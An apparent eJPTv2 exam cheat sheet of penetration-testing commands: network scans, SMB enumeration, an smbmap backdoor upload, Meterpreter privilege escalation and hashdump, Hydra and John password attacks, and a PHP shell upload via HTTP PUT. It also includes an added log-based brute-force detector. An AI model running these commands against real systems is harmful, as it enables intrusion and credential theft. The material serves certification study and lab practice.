eJPTv2 - Cheat Sheet
Disclaimer
This is merely a suggestion based on the tools I personally found useful during the test. I encourage you to take your own notes and tailor your preparation to best suit your needs for the exam.
For additional details about the Exam, please refer to my exam Review post: eJPT Review
Recommended Tools
- Nmap
- Dirbuster
- nikto
- WPSCan
- CrackMapExec
- The Metasploit Framework
- SearchSploit
- Hydra
1. Assessment Methodologies
Ping Sweep
fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24
Simple Bash ping sweep:
#!/bin/bash
### ping_sweep.sh
### ---------------------------------------------------------------
### Objective: ping all hosts in a /24 network and print the ones that reply
### ---------------------------------------------------------------
if [ "$1" == "" ]
then
    echo "PING SWEEP"
    echo "Usage: $0 NETWORK"
    echo "Example: $0 192.168.0"
else
    for host in {1..254}
    do
        # one ICMP echo request per host with a 1 s timeout; print only the addresses that answered
        ping -c 1 -W 1 "$1.$host" | grep "64 bytes" | cut -d ":" -f 1 | cut -d " " -f 4
    done
fi
Nmap - Scans
nmap -sS -A 10.10.10.10
nmap --script vuln -p <open ports from the first scan> 10.10.10.10
OS Detection: nmap -Pn -O 10.10.10.10
Quick Scan: nmap -sC -sV 10.10.10.10
Full Scan: nmap -sC -sV -p- 10.10.10.10
UDP Quick Scan: nmap -sU -sV 10.10.10.10
SMB Enumeration
enum4linux
enum4linux -a <ip> # Enumerating using enum4linux tool
smbclient
smbclient -L //<target IP> -N # Listing available shares (null session)
smbclient //<target IP>/IPC$ -N # Connecting to a share
smbmap
smbmap -u guest -p "" -d . -H <TARGET_IP>
smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP>
## Run a command
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'
Metasploit
# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor
2. Host & Network Auditing
Checking Routes
ip route # Checking defined routes in linux
route # Checking defined routes in linux
route print # Checking defined routes in windows
Adding Manual Routes
ip route add <subnet> via <gateway or router address>
Finding Mac Addresses
ipconfig /all # windows
ifconfig # *nix OSs
ip addr # linux
Checking ARP Cache
arp -a # Windows
arp # *nix OSs
ip neighbour # Linux
Checking for Listening Ports On a Host
#Windows
netstat -ano
Get-NetTCPConnection | where {$_.State -eq 'Listen'}
#Linux
netstat -tunp
lsof -i -P -n | grep LISTEN
ss -tuln
3. Host & Network Penetration Testing
Use the information gathered in phases 1 and 2 to identify an exploitable attack vector.
Below are some helpful Vulnerability assessment resources:
- Searchsploit
- ExploitDB
- Msfconsole search command
- Nessus
Reverse Shell
Excellent online Reverse Shell Generator:
Online - Reverse Shell Generator
Encode-Decode
Metasploit Basic Commands
search x
use x
info
show options, show advanced
set <OPTION> <value> (e.g. set RHOST 10.10.10.10, set payload x)
Meterpreter
#Autoroute
meterpreter> run autoroute -s <subnet>
meterpreter> run autoroute -p # show active route table
#Basic Commands
background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump
Hydra
hydra -U ftp # hydra uses a separate module for each service; this command prints the usage information for a module (here: ftp)
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -l admin -P pass.txt -f ftp://10.10.10.10 # Stop attacking on finding first successful hit for user admin
hydra -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V # Attacking http post form
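The http-post-form attack above leaves a very recognisable trace on the server side: a burst of POST requests to the login page from one source address. The following detector is an added example (not part of the original cheat sheet) that runs over constructed Apache/nginx combined-format log lines and flags any client that POSTs to the login path more than a threshold number of times within a sliding window. The log path `/login.php` and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format, e.g.:
# 203.0.113.5 - - [10/Oct/2023:13:55:00 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bruteforce(lines, login_path="/login.php", threshold=10, window=timedelta(seconds=60)):
    """Return {ip: max_attempts_in_window} for clients whose POSTs to login_path
    reach `threshold` inside any sliding window of length `window`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            attempts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged

def _line(ip, secs, method="POST", path="/login.php"):
    """Build a constructed sample log line `secs` seconds after a fixed base time."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    ts = (base + timedelta(seconds=secs)).strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Constructed sample: 12 POSTs in 22 s from one client (brute force), 3 slow POSTs
# from another (normal user), and one GET that must be ignored.
SAMPLE_LOG = ([_line("203.0.113.5", 2 * i) for i in range(12)]
              + [_line("198.51.100.7", 120 * i) for i in range(3)]
              + [_line("203.0.113.5", 5, method="GET")])
```

Running `find_bruteforce(SAMPLE_LOG)` flags only `203.0.113.5` with 12 attempts; raising the threshold above that, or spreading the attempts over more than the window, makes it disappear.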
John-The-Ripper
john --list=formats
john --incremental --users=<users list> <file to crack> # crack only certain users from a password database such as a copied /etc/shadow file
john --show crackme # Show cracked passwords after the session has finished, where crackme is the password database file
john --wordlist=<wordlist> <file to crack>
john --wordlist=<wordlist> --rules <file to crack> # rules mangle each wordlist entry; for "cat" the candidates include c@t, caT, CAT, CaT
4. Web Application Penetration Testing
Information Gathering
Wappalyzer
whatweb
nikto -h <HOST>
whatweb <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
Banner Grabbing
nc -v 10.10.10.10 <port>
HEAD / HTTP/1.0
OpenSSL for HTTPS services:
openssl s_client -connect 10.10.10.10:443, then send HEAD / HTTP/1.0
Httprint:
httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt
HTTP Verbs
GET, POST, HEAD, PUT, DELETE, OPTIONS
Use the OPTIONS to check if other verbs are available:
nc 10.10.10.10 80
OPTIONS / HTTP/1.0
If the OPTIONS response lists PUT, a PHP shell can be uploaded with it. First determine the file size in bytes, then send a PUT request whose Content-Length matches that size; the payload itself follows the blank line after the headers.
wc -c shell.php
y shell.php
PUT /shell.php HTTP/1.0
Content-Type: text/html
Content-Length: y
Directory and File Scanning
dirsearch.py -u http://10.10.10.10 -e *
gobuster dir -u http://10.10.10.10 -w /path/to/wordlist.txt
ffuf -w /path/to/wordlist.txt:FUZZ -u http://www.evil.com/FUZZ
dirb http://<IP>/
dirbuster &